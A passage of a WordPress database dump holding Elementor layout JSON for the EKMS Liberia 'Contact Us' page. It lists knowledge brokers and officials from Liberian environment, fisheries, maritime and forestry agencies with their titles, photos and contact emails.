\\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24029,3523,'_elementor_edit_mode','builder'),(24030,3523,'_elementor_template_type','wp-page'),(24031,3523,'_elementor_version','3.0.16'),(24032,3523,'_wp_page_template','default'),(24033,3523,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a 